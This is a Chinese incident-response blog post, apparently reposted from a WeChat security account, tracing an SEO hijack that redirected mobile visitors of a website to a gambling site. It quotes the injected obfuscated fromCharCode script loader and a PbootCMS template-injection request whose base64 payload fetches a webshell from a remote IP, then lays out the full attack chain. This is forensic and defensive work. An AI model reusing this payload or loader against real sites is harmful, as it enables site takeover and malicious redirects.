朋友的网站本来想看看seo做的怎么样,结果发现被劫持了。
pc端是正常访问的,手机端则跳转到bc站。
先看看前端里面被劫持的内容
<title>ky体育(ky)(中国)官方网站IOS/安卓通用版/手机APP</title>
<meta name="description" content="第一步:访问ky体育首先,打开您的app浏览器,输入ky体育的官方网址https://www.hth9966.vip.... 第二步:点击注册按钮一旦进入ky体育官网,您会在页面上找到一个醒目的注册按钮。点击该按钮,... 第三步:填写注册信息在注册页面上,您需要填写一些必要的个人信息来创ky体育️" />
<meta name="keywords" content="ky体育(ky)(中国)官方网站IOS/安卓通用版/手机APP" />
<script type="text/javascript"> var bt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,32,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,47,97,104,117,105,46,106,105,115,50,51,50,46,99,99,47,97,104,117,105,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(bt); </script>
HTML解码一下
<script type="text/javascript"> var bt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,32,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,47,47,97,104,117,105,46,106,105,115,50,51,50,46,99,99,47,97,104,117,105,46,106,115,34,62,60,47,115,99,114,105,112,116,62); document.write(bt); </script>
这段js代码直接让ai帮我们分析就好
开始溯源,首先登录网站后台看看日志,日志中显示没有登录成功,那么很明显不是弱口令导致的(因为网站密码是比较强一点的弱口令)。
很明显这修改日期不对劲,因为最近没有操作文件,那很可能就是黑客弄得,那么我们开始还原攻击链
首先从这几个文件日期离我们当前日期最远的wolf.php开始
远程下载大马,命名为King.php,跟服务器的对上了
再看db.php很明显也是个马子,应该是为了防止木马被删故意伪装成db.php
进入服务器开始还原攻击,下载/www/wwwlogs/xx.xx.xxx.xx.log日志文件,搜索wolf.php
/{pboot:if((x22file_put_cox22.x22ntentsx22)(x22wolf.phpx22,(x22base6x22.x224_decodex22)(x22R2lmODlhPD9waHAKJGE9ImNvcHkiOwokYSgiaHR0cDovLzYxLjE0Ny45My4xMjE6OTk4OC9haC50eHQiLCJLaW5nLnBocCIpOwo/Pg==x22)))}{/pboot:if}/../../?p=1
把x22去掉
/{pboot:if((file_put_contents)(wolf.php,(base6.4_decode)(R2lmODlhPD9waHAKJGE9ImNvcHkiOwokYSgiaHR0cDovLzYxLjE0Ny45My4xMjE6OTk4OC9haC50eHQiLCJLaW5nLnBocCIpOwo/Pg==)))}{/pboot:if}/../../?p=1
很明显是PbootCMS模板注入,并且用x22进行绕过了
查看他攻击ip:103.123.4.235,四川的ip估计也是跳板机
大马样本链接https://s.threatbook.com/report/file/c2334df08eb35adf683a0bc0c1f35707a2750fa2b8707ee12a5c83a99783641f?sign=history&env=ubuntu_1704_x64
攻击链:
PbootCMS模板注入getshell>>远程http://61.147.93.121:9988/ah.txt下载大马>>修改template/中的index.html文件>>修改标题和关键字>>调用js文件https://ahui.jis232.cc/ahui.js>>重定向到xxx.vip
漏洞分析文章下次!
原文始发于微信公众号(星云安全):应急响应|SEO暗链排查和溯源
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论